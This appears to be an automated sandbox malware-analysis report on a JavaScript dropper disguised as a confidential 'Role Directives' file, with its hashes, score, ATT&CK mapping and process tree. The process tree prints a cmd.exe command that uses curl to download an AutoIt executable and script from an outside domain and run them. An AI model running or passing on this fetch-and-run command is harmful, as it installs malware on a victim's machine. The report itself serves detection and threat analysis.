d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
18-10-2023 07:18

Target

Role_Directives_Effective_2023_Confidential.js
Size

51KB
MD5

98a065c330d0e987786793a243f7f53e
SHA1

277fc8a50892980c5523d1e1706d706d64e76624
SHA256

54464835989986ae3804a570f5e3b299db8cb2a19a47d6444b1d410ad51586ee
SHA512

ea07611e517669fc9dc3987d57598ccc33487035b1d22a346e40a6c06fcb8f38d1dd1f821bff8a478730ba73913ab518ad41301d13b61aee36fbe680e9943c23
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3PywbIp9:nAIMFFdYMxAcEQDtk9

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 340 wrote to memory of 2224	340	wscript.exe	28
PID 340 wrote to memory of 2224	340	wscript.exe	28
PID 340 wrote to memory of 2224	340	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Role_Directives_Effective_2023_Confidential.js
1⤵
- Suspicious use of WriteProcessMemory
PID:340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o rfihfr.au3 http://hgfdytrywq.com:80/msihthowuna & Autoit3.exe rfihfr.au3
  2⤵
  PID:2224

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact